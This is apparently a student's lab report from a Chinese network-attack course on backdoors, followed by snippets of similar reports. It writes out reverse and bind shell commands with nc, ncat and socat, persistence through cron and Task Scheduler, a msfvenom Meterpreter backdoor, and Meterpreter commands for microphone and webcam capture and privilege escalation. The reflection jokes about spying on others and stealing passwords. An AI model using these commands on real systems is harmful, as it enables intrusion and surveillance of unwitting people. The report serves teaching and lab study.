20155305《网络对抗》后门原理与实践

20155305《网络对抗》后门原理与实践

实验过程(基本后门工具实践)

1、Win获取Linux shell

(1)Win在cmd.exe中使用ipconfig命令查看主机的IP。

(2)Win下载老师的下载地址比较方便、解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口。

(3)Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的5305端口。

连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。

2、Linux获取Win shell

(1)Linux在终端中使用ifconfig命令查看自己的IP。

(2)Linux使用nc -l -p 5305命令监听5305端口。

(3)Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5305端口。

(4)连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

3、使用nc传输数据

(1)Win使用ncat.exe -l 5305命令监听5305端口。

(2)Linux在终端窗口使用nc Win的IP 端口号命令去连接Win的5305端口。

(3)双向传输数据。

4、nc定时启动

(1)Win使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口。

(2)Linux使用crontab -e命令,在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh,在每个小时的这个分钟反向连接Windows主机的端口。

(3)15分时Win获得了Linux的shell,可以显示想要获取的东西

5、实践SoCat的功能

(1)在Win下,依次打开控制面板,管理工具,任务计划程序,然后选择创建一个新任务,填写好任务名称(eg20155305);新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

此时需下载socat.exe老师的下载地址比较方便

(2)刷新查看到新建的任务已经开始运行了若未运行可以右键点击所创建任务并开始运行

(3)Linux下使用socat - tcp:Win的IP:端口命令,此时已经获取了Win的shell,可以查看想知道的东西。

6、实践MSF Meterpreter功能

(1)Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20155305_backdoor.exe(20155305_backdoor.exe是会生成的后门文件的名字)命令生成后门。

(2)将后门传送到Win主机上(我传送到了ncat文件夹下)。遇到杀毒软件要精确将你自己的后门恢复添加信任区(适合用于腾讯电脑管家)

(3)Linux使用msfconsole命令进入控制台,并进行一系列payload、IP、端口的设置。

(4)在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

(5)Linux使用exploit命令开始监听,此时在Win上执行后门程序。

(6)Linux已经和Win连接好了,可以开始尝试不同的功能了。

  • 录音功能:record_mic

  • 拍照功能:webcam_snap

  • 拍摄视频功能:webcam_stream

  • 记录击键功能:screenshot

  • 提权:getuid以及getsystem

实验总结与体会

本次实验让我对这门课程惊为天人哈哈,完全实现小时候所以为的黑客们会做的事情:监控偷看他人,翻看他人电脑里的资料、盗取别人的密码、控制别人的电脑等很酷炫很爽很惊悚。感觉自己学会了一项看似很了不起的技能,感觉拿出去可以和无知的高中小伙伴吹个牛了哈哈,享受一下别人崇拜。所以现在没学免杀,以后学了免杀岂不是更厉害,电脑可以发现我的后门是个病毒我也是很开心哈哈,也就是说我的电脑管家也是有用的嘛哈哈,免杀了就不晓得了。这次收获很大,感谢老师感谢这门课程。

原文地址:https://www.cnblogs.com/20155305ql/p/8657005.html

时间: 2024-08-28 08:27:44

20155305《网络对抗》后门原理与实践的相关文章

20145331魏澍琛《网络对抗》Exp2 后门原理与实践

20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了. (2)例举你知道的后门如何启动起来(win及linux)的方式? 比如下载一个游戏,下下来你会发现除了游戏快捷方式还有什么游戏大厅.游戏加速,或者什么最新的网页游戏(传奇狂暴版),你一好奇一点进去后门就启动了. (3)Meterpreter有哪些给你映像深刻的功能?

20145311王亦徐《网络对抗技术》后门原理与实践

20145311王亦徐<网络对抗技术>后门原理与实践 实验内容 使用netcat.socat获取主机操作Shell,并分别设置cron启动与任务计划启动 使用MSF meterpreter生成后门的可执行文件,并利用ncat或socat传送给主机,接着运行文件获取目标主机的音频.摄像头.击键记录.提权等内容 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 类似于摆渡木马的方式,将移动存储设备插入目标主机,backdoor自动拷贝到目标主机中(2)例举你知道的后门如何启动起

20145317彭垚《网络对抗》Exp2 后门原理与实践

20145317彭垚<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中: 例举你知道的后门如何启动起来(win及linux)的方式? Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的: 对后门程序进行伪装,例如重命名成某个游戏的开始程序之类的,诱骗用户点击启动: Linux下可以通过cron来启动. Meterpreter有哪些给你映像深刻的

20155338《网络对抗》Exp2 后门原理与实践

20155338<网络对抗>Exp2 后门原理与实践 一. 基础问题 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:游览网站中附带的广告或弹出的不正规软件. (2)例举你知道的后门如何启动起来(win及linux)的方式? 答:1.操作系统自带服务: 2.网络协议捆绑: 3.软件编写者制作: 4.漏洞攻击后放置: (3)Meterpreter有哪些给你映像深刻的功能 答:录屏,提升权限和录音. (4)如何发现自己有系统有没有被安装后门 答:用网络命令来看计算机所连接的设备有没有陌

2018-2019-2 20165212《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she

2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及实验内容 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四

20165324 何春江 网络对抗技术 Exp:2 后门原理与实践

20165324 何春江 网络对抗技术 Exp:2 后门原理与实践 课程学习: 后门 后门:是不经过正常认证流程而访问系统的通道,存在与编译器.操作系统.固件和应用中等等. 后门工作流程:程序→植入→运行→免杀. 后门工具:NC(netcat) 是一个底层工具,进行基本的TCP UDP数据收发.常被与其他工具结合使用,起到后门的作用. NC命令 端口扫描 chat Server 文件传输 目录传输 加密数据 流视频 打开shell 反向shell 课下实验 实验准备: 获取IP地址:window

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,

2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题 例举你能想到的一个后门进入到你系统中的可能